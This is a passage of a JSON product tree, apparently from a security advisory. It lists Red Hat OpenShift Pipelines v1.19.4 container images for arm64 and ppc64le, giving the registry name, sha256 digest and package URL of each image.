"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A2ae4928be71ff1fb0adfb8d014e079c912445a53473400881ac9299332694b80?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A73681e67f2bad4ea91e59dc72552ab3706a72c4bb5d815be9bfc493678b68a25?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:e5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3Ae5e1c6a36c43eb534694c6274ed2ed16bb855928e419106634734368d8b62031?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A4cef60130e8555f6b07afa3dde775ad5cce047c8d94ce0f2ff44d48458a019e4?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A4e4910106fd462265aeb93d67d7de49a7e628561e87bae94b93ef3d9ba4ce427?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:dfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3Adfec2fdadaa700e8867619d6a0e2bd392c1a198404e614d35beda9e73c4ea6a7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A740796e3da23eb408b732ef14fe87bd9e16653aa26200b23b7d7aa64cb90c686?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:f869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3Af869e6005bb36b9d0f2e565059c228b6967b33dc463b69de1dcc6f263e07b1e6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A42c27a9a4546aeff7d88be0e1a3a47f23d738b3184b87c09c769fbb2b189d5b8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A28097a799be3dd6d8f500aee2d0ae2ec2a7ccc8a3d2a96a1a4f314a6621ced93?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3Aef9600ffab4ef449efacb7b74c982215406f74b7fc03d969f93004880c97e3ee?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A5aa846a80b2fe91a9eb3ea20496ae4cdfc1f1b4d59708a320d947230cd5287c6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3A563c5ae3792c319b3df29c175d7461c48cee2d453170e4285065f3c418e37df0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3A5bdbe4eeced5d4e13831125bb704c8d7e98cd1fd4cc335a39e204a8676f317eb?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A192657fb34d498d7b731e3852abf89265257f7421e1787bd8fde0019805dc823?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:acbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3Aacbca5c8ed3a1947bea2fda696d84e799fea859e24c4f04256dc7e080fa3e1cf?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A3fbe6b21e0cf29624baf8d73e5b0f184d18abe87ebb728f6da20262cd5c0ab2d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A1c8ffd4b17907e53cb4606524389c89d81cb8ac0b0035cb266dcb411b83a1c77?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3A7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Acdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3Af4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3A3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3Ac85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3A57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product": {
